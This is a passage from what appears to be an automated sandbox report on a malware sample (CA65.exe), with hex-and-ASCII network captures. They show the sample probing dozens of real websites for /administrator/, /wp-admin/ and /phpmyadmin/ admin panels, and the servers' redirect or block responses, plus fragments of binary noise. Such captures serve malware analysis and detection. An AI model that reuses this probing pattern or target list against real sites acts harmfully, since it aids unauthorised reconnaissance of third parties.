427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Dec 22, 2023 21:14:51.584919930 CET	606	IN	Data Raw: ed bc ca 00 f3 8f 65 44 45 ef 31 35 e0 ab 6c 7b 5f ae b6 42 26 03 4b 2e e8 1a 5d 45 6f 30 b9 46 86 80 fa 5b c7 74 df 06 5b c3 ce 97 3c 00 9a 55 d2 af f9 54 d6 77 73 ef 7a ab f2 0b a6 c3 9f 9b 8d 9f b6 f2 af 88 95 22 f5 41 cf 98 89 ec e6 9a bd fd Data Ascii: eDE15l{_B&K.]Eo0F[t[<UTwsz"AJY5!=nY18mEmq)`{btHA2a4=5rZlczF^#19>8-?H^P,HYqv.F#w)'vG'F:oOs1\|h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	55120	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.235640049 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.387254953 CET	953	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://loghole.com/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_SpjijudlDX2V7Wi6FgyTdx3DUV82xyfmrN1K924+fK8vyswuX6RAQubndsKV0spb5q2ro5nUfbnIe7t7oGdUlw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 22, 2023 21:14:51.591355085 CET	953	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://loghole.com/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_SpjijudlDX2V7Wi6FgyTdx3DUV82xyfmrN1K924+fK8vyswuX6RAQubndsKV0spb5q2ro5nUfbnIe7t7oGdUlw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	55119	104.26.0.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.238079071 CET	181	OUT	GET /administrator/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.439636946 CET	849	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 224 Connection: keep-alive X-Frame-Options: SAMEORIGIN Location: https://theproducebox.com/administrator/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8mczYQs4Iw531Oh8EWDh42UWWvcr141NbHOIpyPyzb8arPV5%2FNcEJEdrX920pufpy6zAvnxsyVDixPQyTL6MDbJBMGBoTIYoewF2ljiiwOj7rjUlqK3m6iMq8poFexes070l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0892aaee4974-MIA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://theproducebox.com/administrator/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	55121	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.238399029 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.379677057 CET	848	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 22 Dec 2023 21:14:51 GMT Location: https://cannaclear.com/administrator/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SC%2Fw0R356m6nxxLZd%2BJ3T7%2B5%2FDzCi1o6MLtFFqsbbPQdRpoSG7w%2FRJ4oZPeNrSwOtjp1ibG1qz%2FxPe%2F1RkX7d0Ud%2FcnII3JLvRJXxmuXCUTZNY7Z6tTMlpVD11C%2BHYH0ww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b0892a8b4334d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	55071	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.296921015 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.545553923 CET	682	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Content-Security-Policy: frame-ancestors 'self'; Location: https://www.fotoestudiomiret.com/administrator/ Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.fotoestudiomiret.com/administrator/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	55631	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.340451956 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: coupons2grab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.482853889 CET	341	IN	HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Fri, 22 Dec 2023 20:14:51 GMT Content-length: 122 Content-type: text/html Location: http://www.coupons2grab.com/phpmyadmin/ Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 41 6e 20 65 72 72 6f 72 20 68 61 73 20 6f 63 63 75 72 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>An error has occurred.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	55401	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655244112 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.790694952 CET	636	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 22 Dec 2023 21:14:51 GMT Location: https://thenile.com.au/administrator/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z7xeBIEMnSlf%2BRvvF2l1l0oGm9zC4jEfqPs9Wc%2BtoNMCtEBD8cWBgHztjHpSf2DHJtdBhHNdvOzFVMxpkngapzcti70zuO01npOwqYw3EKI0nidKXAg9HdTPkfq5fmCV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 839b08953b726da3-MIA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	55395	66.254.66.55	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655272961 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: ireland-ventures.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	55397	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655276060 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: sunbeltfinancial.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	55396	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655330896 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: yuejichem.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	55393	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655391932 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: shapeab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	55394	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655394077 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: tgeddesgrant.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.780703068 CET	1286	IN	HTTP/1.1 403 Forbidden Server: Sucuri/Cloudproxy Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Sucuri-ID: 17008 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Sucuri-Block: 2FA2 Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20 76 69 73 69 74 20 69 73 20 70 72 6f 74 65 63 74 65 64 20 62 79 20 74 77 6f 20 66 61 63 74 6f 72 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 28 32 46 41 29 20 75 73 69 6e 67 20 47 6f 6f 67 6c 65 20 41 75 74 68 65 6e 74 69 63 61 74 6f 72 2e 20 54 68 69 73 Data Ascii: 308<!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" href="https://cdn.sucuri.net/sucuri-firewall-block.css" /><section class="center clearfix"><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>Sucuri WebSite Firewall - Access Denied</title><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700" rel="stylesheet" type="text/css"></head><body><div id="main-container"><header class="app-header clearfix"><div class="wrap"><a href="https://www.sucuri.net/?utm_source=firewall_block" class="logo"></a><span class="logo-neartext">Website Firewall</span><a href="https://sucuri.net/?utm_source=firewall_block" class="site-link">Back to sucuri.net</a></div></header>1cc<section class="app-content clearfix"><div class="box"><p class="medium-text">This page you are trying to visit is protected by two factor authentication (2FA) using Google Authenticator. This
Dec 22, 2023 21:14:51.780713081 CET	268	IN	Data Raw: 20 77 61 73 20 73 65 74 75 70 20 62 79 20 74 68 65 20 77 65 62 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 72 65 73 74 72 69 63 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 70 61 67 65 2e 20 50 6c 65 61 73 65 20 6f 70 Data Ascii: was setup by the website administrator to restrict access to this page. Please open Google Authenticator on your mobile device and use the token generated there. If you do not have it setup yet, please contact the website administrator to ge
Dec 22, 2023 21:14:51.780812025 CET	1056	IN	Data Raw: 33 30 64 0d 0a 3c 64 69 76 20 69 64 3d 22 62 6c 6f 63 6b 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 61 70 74 63 68 61 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 77 69 64 74 68 3d 39 34 30 70 78 3e 0a 3c 68 33 20 63 6c 61 73 73 Data Ascii: 30d<div id="block-details" class="captcha" align="center" width=940px><h3 class="captcha-title" style="text-align:center;">Please add your code</h3><form method="post"><input style="font-size: 20px; width: 200px;padding: 0px 0px 8px; line

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	55390	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655441046 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: easlab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	55391	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655445099 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: coupons2grab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.796091080 CET	344	IN	HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Fri, 22 Dec 2023 20:14:51 GMT Content-length: 122 Content-type: text/html Location: http://www.coupons2grab.com/administrator/ Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 41 6e 20 65 72 72 6f 72 20 68 61 73 20 6f 63 63 75 72 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>An error has occurred.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	55389	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655483961 CET	181	OUT	GET /administrator/ HTTP/1.1 Host: grassgraphics.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	55388	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655486107 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	55400	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655520916 CET	176	OUT	GET /administrator/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	55392	13.248.169.48	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655524969 CET	189	OUT	GET /administrator/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	55402	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655559063 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: davescheirer.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	55403	185.162.89.66	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655563116 CET	186	OUT	GET /administrator/ HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	55382	208.91.197.26	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655577898 CET	167	OUT	GET /wp-admin/ HTTP/1.1 Host: eddc.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	55386	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655605078 CET	173	OUT	GET /administrator/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
